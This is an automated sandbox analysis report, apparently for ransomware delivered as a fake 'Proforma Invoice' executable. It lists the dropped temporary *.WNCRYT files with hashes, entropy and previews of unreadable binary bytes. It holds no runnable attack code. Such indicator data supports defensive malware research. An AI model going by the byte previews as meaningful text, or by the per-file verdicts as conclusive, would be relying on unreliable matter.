                                                          Preview:u.....8...N.4...+..~.7K5.n.iL\*d.*6h...<.g.X.ww.&!.sCsQ.I.......6.9.......1h....c...._8J&1.;D..keB2.....6..v.V.......l{...eY...kn....o$V.].H(r.eY..i.........o..(.B...~..BV.D..u..?.._.L....|.x...o..,...d(.w..v;Q.....U}>..b@pZ.0{..V'...>%-y.|..z{...3.0ID...../..r......Z...+v.- .[..s.@..7....H.#..K...y.Bm...}.{o8.`..J0....EC.:..V..+..rW.Kp..qW...v.'.........>*..2y[n.|f...zY.V< ........t...%.g......v......._.:.].:..V.2.{kq.t.!.I...^K..Ru.Z..3.....3z......5.bF....j+.)....9..q..E.K..n_C.ph..b`.R)......7.....&Y...U....R6....\....._./...G.6..m7.-.$..hS.%x0.:X..{..?.;.j...Z.0.N.b......)..#..{Ju.,i.p*.........b....$....'.\..;.L<...R...E..4..1u..m.....\.N.P.(<.pw..u.[........r%.{.&!Zv...mw:.&..oUwgx.....+U~.hSd.p..N.7.{ &vkl.c..3.a.P2..CA....M4...^.....X.C.9...Q..g..)......zF...C.*...."/.sgq.`=.F....tmc.;.f.:.....}..8.q.6..e.}..ME.."..0^..q..b..>..*...)..4..........s..~9...2.......-;..2R.Q)*`s.[.1.a8Lo.I.q.......WNP...]FLWp.&..)..o...8.T..

                                                          C:\Users\user\AppData\Local\Temp\35.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.812807498961308
                                                          Encrypted:false
                                                          SSDEEP:24:iw32IUQJeL0Uy9xNPoH84bwavN+EwSfMaG8:iQ2Iq0Uy9xhcDbw6RjfMaG8
                                                          MD5:210167F483BBD3BFA15FA6AD84AA3769
                                                          SHA1:E27FDA35002F597F03C7F30DF0A0EEFD130E8EFD
                                                          SHA-256:848593B73A0D7F3105A7624F98EB1B6F77AC7D8B3608667028C9E55DCF4EA94C
                                                          SHA-512:DC799BF43EBFDA81D023425A7A862D3A99D44BF9D0F29D4EAF5B597E739D3FAA6890C58062A191A9D0746203574AD0391E312FC344554E54C4A4827F8E8ECCCB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..J....^..%t...Q......]...;....f...ibb...t.6E....[..3~`%.*....h.t............ Z.,....c.v.%.. .s...f..],.. ...c45.d....P...:P.....6.^.\....].......m...~...vV......('.P(?.n.[..*`.sK...-O...........4...2./-..^.*........1.VE.L#..F.....X..nj.x7.....R.o...a.,.....Z..'...w..N..J.]Q.S ...*.6............`...@C.../...:.....R..n.$.\..j.J..$.K....4....3.q. 0.x...0...B.E.={.k.7.O.J+..m..u...'.....*.Rs.u+.}H(w.z.....; E.}FGU...6..x._...=i...?...|r...t;.u... .I.n..0..,:... ..E.-....!*..*.>..-.UY...H...T..E./..m6j..B).v%..r&u...../...._.0.(..>j.Qh..p..b..."|(.#.)...-.y.....}$,.;...J}._...|...gQ.w}.....\.N76.z....OX.......d\..OL)..... .?....Z.........P]d....j....f......fP...JZ.9..u,DA.b.....R./H+p..LJ.Jpx.9<..O*.t*.K.`..8L..q...?6..m;..|......&\..n..(.kHC.U..o.vB....|.6..R...e_v....>.....m..../..jG....N.|Jl.M....|.(.........g4.].K...]w.<...=D.i...VT.U.g...I.\...w...kM.k.....hNq.9.5...Y...k....2.....^FR..jO...[|.z.Tj....(...!.......9.2=.....n2.-~..$..9..V

                                                          C:\Users\user\AppData\Local\Temp\36.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.79774463592345
                                                          Encrypted:false
                                                          SSDEEP:24:soKX9TyCtuHGuqdwlPmlv3fovmDAaykc0crC/k78VO5:sX9ptumElPsv3fo+DHbcrC/CG4
                                                          MD5:9FBCF1C52751A4AD88F188E99BE02E73
                                                          SHA1:1A8393556D7C6B21C8852C4515B987FB4ED5ED42
                                                          SHA-256:4EFA7AF968DFC95E022EED232E158965A5412266069B6FD3D63121C8EF136CF8
                                                          SHA-512:6742B364F6903DF8AD8887528F854E88520F4AFFBC1BF4816DA8B4369AF4EA7ECEDC550FF5E36F76242F67010FCC805DA0A3FEDA4363C64D1DEF61F7A9C738AE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:/..f..,.w...c.........4..}Vwq.`..<.k.#.:.....{....c)....u.ZW!N..WebGC..87.810...{%..=..3.~.-..:.....Z5...H...\.\...^fdf.b..iz.qgJ.].R,Q.6...V.|....Rr.o../.....Ho.z..#..L.....\L./.....Qt.`..S..#...d..4cf*/....zW....a..J->.`..J.W....../..j>.C.}.&.'d......_...o.lI.o7R....y...8.|.P.u..'.E.H....W....xV.:.........;......c^..z..X..h.;.1{UF4W...*..~..2.....[Y..2. .*....W.IKH...a.....#sU.U..c...YS.c..0...Q......H/...)..@.*q.Yz...N~...v.s..4...x4..6.BA.A=.t.F.f6g..&...&V).x....Uq.V.....xss. ..<G..f).J....3#.....OT)4.>,Sz%....Z.?..e..H..M..0.-R4.R.O...... ./....."....n..y.m.0.....l.Of...Z.RB...86@.G.%b.aJ;..........3,..;...... .Y...........D.6.i...e+Yf...I....<...M?qedm...3x......LM.u.(...h...|.....[.j.M...q.F...3..^.6.9..Z.3~-n..7.v"..\.=^....E*..|...F.l......bDC....F.....v..X..........F...,4......2...g8,7..qj..R...s....m.9..U.D...S..`.......d...E+..<'...Bna..c.=|.e.....`...T.....R....,...`^..0._q.|.J2...I...4....q.(Je......,.s-..ep.. ....%..:lst.O.

                                                          C:\Users\user\AppData\Local\Temp\37.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.7842309560531975
                                                          Encrypted:false
                                                          SSDEEP:24:ndHzTg1FkuH201oYNdw7SJvX2cx2/BV36O7NHIb2gAIMi:n5inVkk2pV39ZHMBj
                                                          MD5:95BA734036D042FF4959AA2EA0F28DF2
                                                          SHA1:581AFECFA672896C8A09EB82E079D6DBAA2CE94C
                                                          SHA-256:CC21DEE97C14CC783844A307040327C3E8A3CA3B37E208BDDE31FD940F16F207
                                                          SHA-512:B48FA94BBC999C36D2E918D0320507C4719F9E070E11175BD53BB0061823B4CD3B331A338FCB7F377C25440AFA1FF1A7EADED583B630FD6E661A5F7770BDB9F2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:].o}....~1.]...0]fJ....q+.q.G..hj0.R. ..S.U.G.90....RV..Nz5.Er..l.E#z...1#.=.u..i@.`..k>..C..w.$... ..[.s]..d".*....~.5.6.W-\.7.H.....dC.K.?0...5i1..-^.]...g.tR.;..%_..g...P..s..r.V...[E_..=33.Z.6<'...f./.&[WR&.^..IT.....,d..g]..A..l..u.4.2-V.X.....1)...z.-..g..5..O...X3.@9>Y.3hOw.]..m../Z.E.......zV......B.e.......xg.p.../.a...EV...y..y.7v#qT@..X....g8.b(.j"g....e..,..}..*.C.i:.Vq../.J97.....X..d...K...0z..1.m..|_.E..R..&...WF..Z[Q`.})u.|Sa.8?K.K.CI.......QJ..za...c...p.A.~..:......'..5qajW@K...'CkG:HYRQT.w\....-."...jr...Z.W'(S.87$.....P...m..'.......2..j.U....]_a.X.t)..'...6....Kk...........iV$q......l.1....b....k]R.A.......%....X.....3..4.#..g...K.Z....[x\..KJ...... ....d.s.B..h.C...g.....&.l.8P<(G...O.d ..^.....Z.P...%...G1<..O?.....-1,....-.._Kn...g.~.&>{'.0s.'.k..U..{.|2..F.)E5.0....;..w..N.q.0.._=t.......(.R...A.m..<M.k6..nhx...~..9.a...p..........1._8...R...*.yI...9m./I*.B.3&..n..g..k.eZ.c..rE.%.2x.&7Qf.......H...V.......^..,bu

                                                          C:\Users\user\AppData\Local\Temp\38.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.782252994580477
                                                          Encrypted:false
                                                          SSDEEP:24:Qf26G7obyAr2qPiBGLWN/PMytcrWDS9asbh7fEi:BUyAKqPiFWRrWbACi
                                                          MD5:32BCBD5C41C7B80F3C9CB2316F848ABB
                                                          SHA1:25B4E70583A98EF40F0C9CD68AE9250F5DFF229A
                                                          SHA-256:B69412CDD54229ED9E09471BA62DD506F2C7B9F5C7D64D6BD9C91540234D94AD
                                                          SHA-512:46DAC914E59BE4F5DA639737B7CFE7663E30CABAE54C323D64B20C128D03A3F1806C94B812C480A67A39803EED001E054F66FF3610A3419B26B4D349813E6F13
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:C.R....P..u.sF.!.....lG+... ..{$yL.,....aZ.I.....(.B.P.B9=[...Z...h<#..\.F.s.#5..r.3G.....Z.aRJ.VK...i. A;*k......M:._.0.E..w.NR..... ..N.*..........f...... ~,..L..?.6.c....h.E....j;#`.%.V.}.L.S.....9.j.9.s...<.#.h\.......&....;...9w....2....Y....O).....DHKI.?.A)..m.TqN6\.c.xw..d.;....0.y.9.!.%.).......K0..\.^.HL&-..|8..>r...*\{.S...;.....Z@z...8.i.|..Z.C....~..(.................Z0.....Pi.%< .W..g...i...w.@+.2.W]....ee.5s.t....E`c.f.b.t.hb..D....2...1..x..-..1....=ks.A4c..C...J.....r.E......sA{.....!N.W...YW.|*x9.,..7.38.;^.(.Z...R.`+.1e%=..\_.k".%..:..M./.^/...v..(f..l.6.......U.!...U.?w...,....A.R"w(8....7]`>,...F.I..G.w..*K...Y....,.<.....\..a..Y.....).L....~.|...x}.~.[0...:..)...*.....Y..x-.M9...s.F.=bbXV/.3..p&{ Nt...!...z.Nk.qFbtr`...] *o..... ......&}C.]W...5.+. K.j.A-..2..:._..R.s*(j.....R.N.......dD.ct).j.o....^.O n....P..E4c.E..MD.(#.Rc.......qk.?....s..D...1;.3 8.:.<r.6h.c.vc..[d.....>.xrZ..q:...,......K..<...d.W..lUT.zO.=-.up...+(..

                                                          C:\Users\user\AppData\Local\Temp\39.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.81852808756566
                                                          Encrypted:false
                                                          SSDEEP:24:HMlnB6eczFAOOLFmOa0FVtQAKh3GCj0l88e2efmfVBa:A3cvO5xoACGCj0lNUfQC
                                                          MD5:84F7A2B880AE174CC4551756013B3B54
                                                          SHA1:F9D9E1DBB0EC1407F8310522B488261548253E45
                                                          SHA-256:2F8F4D197948FE948FF9789EE130F8D6147F6167C0F49C0854D3BC36128F341A
                                                          SHA-512:94514F78CA07E2673BDBD287CB8F801E4DEC34D302E2A5FD57E157F14BF08A78BAD38A971E7E0DE64CE5C9A77BBF54D9AA881D109E0910F8B910FA1155E56BAC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:[.i.......N>.@....L...8..YH.!......R.L</c.2)......Z.X.#.Q.J......U(....!..R....p.U.]^.3....[.[...3..&..{....Q p...U;S..>...Q...E...=.._.....L *.4K.a...4......Xk....?\r.Bv...{N.H.......h..:..F..`*^.Fw.........R>.2.2,.j...5..rx...8.Q?V./(..W#...`.$.....QU.......P'....!VW.pF9=3u.Cg..$w...;.Sb.^.f.c1...88'.ts6.^x.].X...2..:.......ik.................A..%.;s.k.I..<>..He.&.w.ch..{y!.(.r^..RO?..!.=..3.2....5)b..<.2&...ur.,s..z....2..i......k.h.S...o....i..x..B.."..l.o.v..&E.r..=2y....f.........{.kl.c{....,..ni.9..[..:./>..@}.A..pZ.S\......l.Qx.5............J..y-.....;q.T..MN..f.4^X..1W.N...w..q.H.H.QS......-@..S...<......m...a....L...%....)`...y".>=..]D.}J.~..n*&u........9...!v.....=M...V...VO.V}..G...nouH..<..jwbdww.}.F..6]......K.'...m.K.>..=,.g.'....Ho...G.r.,.E..gn.....*x.==sk.)..$.2.&.9.(..rAf#.(G.qR...c.B..>.....&..x...._s$..[.W.....L.........%.~Q.....a.....,$.8......'3....x.9.m..Q.^.`.b.~.....u.7.c"..S....rd1.r.71.1....d.z_.I.^..&+.?.

                                                          C:\Users\user\AppData\Local\Temp\4.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.812830001482073
                                                          Encrypted:false
                                                          SSDEEP:24:lzNCEvn3naaqtZBX1C9yle4DBxE3UEjXJ0SghZW:lzNC6n3antZBG8DBxqUYSSMW
                                                          MD5:AA341E3728B2E710AD7F37ACEADC70FB
                                                          SHA1:A4A784F2BCD68568121547A3619E572DD57836BB
                                                          SHA-256:6F80D5CD465495967E3F3D3E8E5A02BE837550902CD214E79F6367DCE0C4895D
                                                          SHA-512:D8A5CBE26ACBF6A74AA54629AE4A037ADEAC279DAC5EB1D308E3E977B7B85638D107AE9774A37836F2EDA1F8FA2F0B67C18A635EF2058031EBA61B8FD19D19BA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:\C....X# .......~.1.....ZB.y;.|.&... .V.?.........3:...;.c.>.&...$Y.T.{....X.[...k..,.36....c...{y....8.G...ds.i....l.f....B.......B'.W.w....v.BG|.Rh..^z......*...`...^..?.aj.#.3...gi........bcZI..c#......sC..4......<:.<^i20....Y...z....o....... eK.*.J......m...w..e$....6...x....n\2........C...C..W...H$.C....4..Yz)Y.gk...3.,v.V.{z.7W.7....q.k ..;.~Ey..6`4..>s..yq...J..WA.S....jr..!l...O..<....q...9.fm.4s.5. +zNJ.?.6....h'ap.$....ar(G.H..j^...i>.t?.9..f..p.#~.[a.......+&~j4.....^?.......x...gBf.l.mU........8.......x@.....R..!O..b....:#..W..#.c.6..h..8...Q.E..y...Vv..=.|.}.D1Q...Jh.,JG...y...(..`......e.\...8./?:..+..[sa*..b...:D.O...qW..F.%..c.z|........0...Yc:.}.-....w...I...k.......s.q=...C.u.,]...Q.".!.Q....p.B....<.@..w7.}.....w.p.....^.}K..\..z.t.U.$..H...a}.n..9\.6.IPN..../I...g.X..f...pE.e.}Vcd..g..3.k...iI...{.m.G.[.<..+........?Qql..Ic.[....{.y..].0j...]..q.5..<.1....%g.z...... ....../l..h...0.=....yUg.......].../....E=.

                                                          C:\Users\user\AppData\Local\Temp\40.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.82126842594817
                                                          Encrypted:false
                                                          SSDEEP:24:ZNkHLExWn9gcKhbdV1XNECwzGphnEWFfeP5yLXTOK7GRTx4:j+EILybj8HQhnA5mhGRW
                                                          MD5:5E2FA6BCCD72E2339910C266102B9D95
                                                          SHA1:A85DFA83764C7D43C361C919DF5A3D61C5232687
                                                          SHA-256:2FD7B3CD2AA0088EA92E23CC05CC254AE0F3E15CD5ADAE8F8B1E13C3F91CD0CA
                                                          SHA-512:38E1F7391114994CDF9A7D7324DF990226601BCB5F3E4F5FEE3B08F5C9F4725B77E9E2ECC538DF35C462687F0AEC8B59521ABDAD0EE6DC875DD8FD162FD0CE8E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:p..w&..dQ)F..[qj{.y....?)...s.B.bpM..G....e....n...E....3....|f...}......T...2#..z._*.8..~r._.$..C..].J64.../...|.%E.F..u.H...`..K9,]....m.[..{.E.I:........yh..Gx3ecI98.N~......wT.V3K../.Z...kK...........).;^4!.d....F.T..E..].3....7.e . C.h.b....8..|.z...W~.^.....#.D.i.^...ly$]..T.R.+a{...m.q/...^y. e...W4.cL....@.0....1..APV......i....P."..1.......ZB. -...q...*`....U..U....T.......{..v'0..3.Sk......$..s.=..!.;.rj%.Z.3F\.c\.>....o.......K......).)..R.7.....H0u.&.y...FH...Vt.....|.."t..jI.;....V.S.A.L..........f}2.r.U....!bV...sf0....B3.u.....Q...}....)R>*.3o.^'6...uI.....bR._.....$9.0........7...(0.{G..le.2....AI...^.!...:.....8.Zc.fg...`.k9..V(.^.a...Tr..R...K5.d...H`.C..........l..y.okR]X....;.}VT=...?...I...f.......V..=..,S].....\....4..q.....a.^.'.Q...Z.f!0Yf>C..e........$.sn.,.u3..:..F....Z..9y|2..h.Z....|.Qt:..d.$.<..!..<.V)b...,..k..]....3..L....B...b.A...........@.....$..*..|.....h]...<s...v....1..g..]...yQ.+.}..W..n...O..

                                                          C:\Users\user\AppData\Local\Temp\41.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.824193176060253
                                                          Encrypted:false
                                                          SSDEEP:24:OahszzHUchuEkke5581nqlBndsOXtSexowtGjgQ9D8LZrOfYZACC6s:/scTEkvQqlBWedcgQ9aOcCJ
                                                          MD5:CE809ED94E41990DABFCA8234D0B5735
                                                          SHA1:60DEACD34E8C524A495E3B0675915BEF958F67A2
                                                          SHA-256:D1C0FC9897B7DE837B47E28F05B8879608CB28B1FBC4E452072C65844375B941
                                                          SHA-512:DE833F95DFFACAEC9302A94907DA86F74288C6E4E40EA97E668A19EF9C221088A7A32F07BA07CB47ABF694E905619291B52B926E51FF9CBFCE555AEB1360B10E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..)v5xE.0...4...j....d):X..e..3.M.q...#...:..mT..k.0.ss..oA?l...{....6..q.N....Fly.Q..L9,-9.jD..@.>....t..l..KV6Z.X.......a..S..W....]...I.d....K. #58..[..H...T..........e.+..NXT...1...re/...M.A...m.f-Pl.B=;.Vd..f.....:..{TF../.2..G.;..c}.wu.F......z[...g....cn?.<.....zk.,../..v...J..,2;...E&..Q....+.CxU)aly{..N..6=3=../.Pm.#.._..>#..kt..B.....]E.j.Z.2.T.b.,!S.+.N$JX(~m......W<....V.u<.).]B...'...x.j.....w.........VZ........._.*..8l.....#".......@.!.\...f..ik.....j..$^.f....ddC.[.Q.g.o..z.... M.....v7.G3.}....9c..uz.j\-O...K..%......b..IF-..R4g.E.....8.A.[40..6@:.,..@....+...Z.....w;.^(....:.O..WNbSn...^.T-..[..A..?.....o.C..j.L...B.....Y...U....."sC%.Wr.c.8.dr..X*{.D..l.n...G..x.m.i@,s....%..+.LDw..L.B..P....@..#.7,o.>$.M.|:.za.N.....EY=..`....%F...@.........O...`f......}|..K...?..[..Nf.D..P.o.)....:.+..cQ......wK.D.q!&f...F...~....f3..q.MRQ=..a!.sB5t=.]_U.V.~.....V..vLa=f......'..02).S.&.~..#....QRrYn..e...#.2..F7.....P....e@.c._...?..

                                                          C:\Users\user\AppData\Local\Temp\42.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):271360
                                                          Entropy (8bit):7.999251702688857
                                                          Encrypted:true
                                                          SSDEEP:6144:nm+2KG2DxX4i2d5WYgYOK5PTYREt/j+Z9qpvyWYJlG5mmM:nm+BBxuaYhX7OA/jigpvu3G5mmM
                                                          MD5:B103D8F0B3532D62D3C2EC56EFA2C68A
                                                          SHA1:ADD37CA55017F6C48C2DC0075BFFD6E539E2658E
                                                          SHA-256:AABDAEDD41777838A2AFC22434DE19B8EBC46992ABD32987FEB6E28D2DD7DA65
                                                          SHA-512:3FAC126233C5DE65AE0934FEB6053F433CEE9E9BDE0CF6EF98C4F91A9E7184E1DD44368B7104FEFD6408D65F48806777FBD1E226D82F4A38C13A9BB43489900A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:<...)....?..by.Cmr."Y....!..=..VF........&..y.A..;..1.5...H..C..U.@!.%....f6.a...!....2.1.Oc#...C..7. t.oLU.2...x........1GD.).!o.T.%xJ..RK.&..Jl:}l.py....z...p.){.....'.HDas..>!.......V>.......I&.,..'.&...ke....;.-...4V.....K.D...(T.7=....Zs...e}.Y9Bxu..Y............a..k.CD..6....j.<@@..2n.....P...k?...o........ ....T....A.y..q...N^.GF...9o.!...y`#t..@..W...f...........F.-7F.xu..<#?.Bs..b..~c...'. .p..(...~....6.Q..w.%=.....G.O.y.......`.6u..F{._.....%9C....O.&|......[,[....4V...i.......Dx......//....hU.i....T.1j.:~.\([Q.jiK..+.&.U....V.M.~..N.y.w#...A.g*0.T.^.v.. ).x.}8_.K<..#~..p.w..."....}..OI...Vji.....q...)B..!..r........:.%X..(9[..).2.0Jl.~..D..v..p)hJ......6K. QG.9.8...8B.~FR,s..qh..Xo.7.^u}<.@k..g/DR.x..L...(.|...&O.8;(n.....85.......<..2.....4./..P...$....Q.?.tG.w..K....&...m...`."E..>....|...!L..TqnV.RR..t.....j.oFT.c.S.4&.5............_..S..d.#...P.......x..n...Z.s..9h.E...7q.f.UR..r..a..?.{...oK...@a......"...3..#.I.tqDb.*..

                                                          C:\Users\user\AppData\Local\Temp\43.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.794803001924923
                                                          Encrypted:false
                                                          SSDEEP:24:Bz4SAImiN7IVEZ6/QqozCs/uCuwutQpYUGueuqYED1UZ7b7n:BW7iFIEo/JYCsdm0pebJmZP7
                                                          MD5:1D13DA032FA361CFB76B5CFF5719FE82
                                                          SHA1:F5F31E4C36928A6C6BDD303114ADED800353D32A
                                                          SHA-256:D545D870A3C5CB77E2CDC2D12CA65A845122E33FC478E97978429F74AC6AF919
                                                          SHA-512:CA5B4CF764DA508031102AEE136D773CEADC25A4F3002F7E8887647CC7543C29A17C14B14285BC8CA73CE36109D345C4D57DD9198D4233803654166FC7EC9B94
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...o...........8).v...}:.Y4[.C&.oXX`pi.k..R`.....4.r.....W..v.....z.R.a....k..b8_...0..G_..9.+.$........l.]1.u.......u.k......o.T.....W.sLD._Rq.&B..&....t..5HY......O.3....PK\0.*'ZN....(....3..Hw1..Q.{.[..$W......h.[..-.|cSt.3.Y..R.<.o.uu...{*.0b..K..h``N<.........,..T...G.MsV;..U....M<.s.S\h.....\...Q<).pl'..Vd^.S.t....G...8.K+..3.j.....{.@g......tt..'..0.yW...%M...{.@"...<?..Jm.a.j-`.wH.Q.)....'E.......a..m..u...xc]`SX.AO..:..{.h.....&..?..W!...9..J9.....Q....b#.y..L.f.....R|.Oa.P.EA..`1..AG.%F+.....l5.kH.%6.........A.M6....V..2.aq`Z..t.P.o.Z.H.....)........1....BG.&.l...t.{G..P...i.1.e:.....M......9..p.I ..#.;....-N.T.....'F...7....R...Nj..Om..|j...!X...Da/.n.!......>S.......$9t..:a).bC.D.....Yo.....<...n.s s.0c......D(.... ....]2.t..6..m..t@..%R.~...@\.....eJ....(.-...!=be.1.;QE.Pb5RPr..<..j.eu........$...??s...c..3.>T..v#,P......3{...............E.. uv<..g.D.....O.tk7wN.......X..Su,.jWU.s.y.`oi...r...H.m......C....0^`.}x..m.1.8.$w.=E..

                                                          C:\Users\user\AppData\Local\Temp\44.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.789710739446829
                                                          Encrypted:false
                                                          SSDEEP:24:53KV8andSWgEM7lLnhrCJoKgbg27f/MPSxPnpfkXrHU:56VXtA7lLnhrCvAuCPn1kXr0
                                                          MD5:C587FFC44075D235F3CF888592089B8F
                                                          SHA1:1714F0AE1B6F8931D62DDF9B4F14429C4622AB2E
                                                          SHA-256:D461AAE5215EB856A7D54A573A14194A0BC18CD8859CC8E1E72140855FCE0571
                                                          SHA-512:FC2126ADBA9C705E33BB0316554264C0E075E9438F81A3DA4872DA710957DECDB69DD5CBBE57C09C1B0300D0C0EF82A1BB46561A3F085FD3731BD05818E6381E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:;..l..u...h......m.../...v5v..(Ak..<k...r.?5..Z[x.=....S...Z......+.n....@..........U3......%......O.q.../.... . VH.s.L..-.}.p.(u.%;...........{.oL.? .... .5c{..z..*........r@...a..~...... .*.P.....!p}k...c...l.d#.ehr.....S).,M`c.e '..c:.l_.1...R.y"..U.2....<=.J.~O.x..Yt...8..J....|...}ZH3.P..q..-#......e.Q3od..._...._j.1B......s.'...l."..0.O.5>...^@X.x..=...y{.\.8......\.......E.~R..._h.iRr...(.......4....0X.q.c^.1>...}.>V.7y.`.r8Y..1w7..".@.....P{......T..dtS............A.j..0....}.....'...'.6..p....:q.6. ...Ko...q.?....A......3rC..l;,m.......'..$......y.0<....m&.."G......4..".h3...y.....]5......u.eu`YVs..>.......V.(qr....v..I..^U..ZW........<..bZ.6..v../....B.ZS{.6IW.....a.1..c.S.....9..C........<|...h.g........A.vc[.......E+.`.e.H......k.{.7....2hoU|G.e.s....gg..-.".:+......\..$.._...|Q.%.R@....z...^L..V...L.....-D..f.~...I.S..........%$0. ... ....S..2..(.<....k-.Nw .....#.|.x.%..st.@..:51..Q+rU~.%...K....4."..n"I4/.B.z..T..f.....

                                                          C:\Users\user\AppData\Local\Temp\45.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.811154944660018
                                                          Encrypted:false
                                                          SSDEEP:24:+vsunKW+c6jQiFxSePvnbvPY0Fu0VCEkR1bUhj9:1aSBUO3PvbvQ0KN74D
                                                          MD5:538C27E0F6B1001FD601196518FEE4D8
                                                          SHA1:6D5D5F0F81107F3D9918148816496944BED85A50
                                                          SHA-256:0B430FA884CD62DBAC765F89B8784D25BFD82B9C503126A3CF383A23C18991DC
                                                          SHA-512:118C8A9FB63E9DA7CC262C93997339CF622D0A9149C1E5CD82D658E7241773577D31E17644B64CE801AD08924B11606B5D14197F647688EA3272110F51EB438F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..'..#V.......)...W...s.b...A<*i....|..o..9...j...3..m.\H.;.fY.'....L..7L....D...8..J..--s.... .y`.w.m.-.........;=..^.*Y*.%......9..........WZPc{...$XX."...7.......1z~...k...L6......c.o.Y.)w!.....s..L......F...&.Q<(o.....f#....._.[.9.......~..X>.C[............B..Hr..#bL....%.X/.Y..-u..>8.).g."!.y.........n..P+..5.Dr.........7..>l..+)u.).E..#...(.A..J.....>.....l....MfC..VSc..5cB...a[.E6..W]r..N..91...9...D.V.d.&.".|..@.f+....!....E...H#.{......3........Q.........l....'0.....F.'.<.....8h..>Nw..pn..)...h.LI..?..5..,u.bz...(.Jx..4..p.,...M..0..mP.&..Y...M|r.g.......bt..#......-...1...;.+0trUL...(...G.d..I>.'?.*.);.p4..[m..f!..j.-..A....Q..6..K./6 5.Og.I.;...s.....c.tV2t..;.....X..eobr....Bu......s.x.+...}.Q;.."..E...}..=.^?......]pyR....W.&.x..q.$...t...l,eC..:.,q.,....i.....o5..Y....v......8...}...".\e...+..*.$y.._....7t...Fq_..&s.|.}7.u.5$...L.->.{.W .s&..B.)e.....ty.8..1.tqW5....r{+..,a..I....m..Bj.....#..+..F].....ELh..FG....!.7...&$?)...v.

                                                          C:\Users\user\AppData\Local\Temp\46.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.7934136993049234
                                                          Encrypted:false
                                                          SSDEEP:24:Zx18eP+SY6u6RMN9u9jkuAp/6Sxn8o9paG4RYGIOWpyMch:vtmSY6qN9u94uAl6Gn8GaG4RpxKyMch
                                                          MD5:CA84C077B82EA5A847AB245EA15728F7
                                                          SHA1:6B0B9D8B6F34EEE3739FF856A7636C8FDF0213C8
                                                          SHA-256:5563E2FE5F9A991636E46BBA70783A89362480763E0C69EA0EC62337C73877A9
                                                          SHA-512:B6F979148723EFAB947A01970A405F14052C3B24BD19620123E9EDF46EF8527BBC3CF1F4AF35F70EF060CAF8995C9D3A8C0F58791C62D22D88CCCA087D11D66C
                                                          Malicious:false
                                                          Reputation:unknown
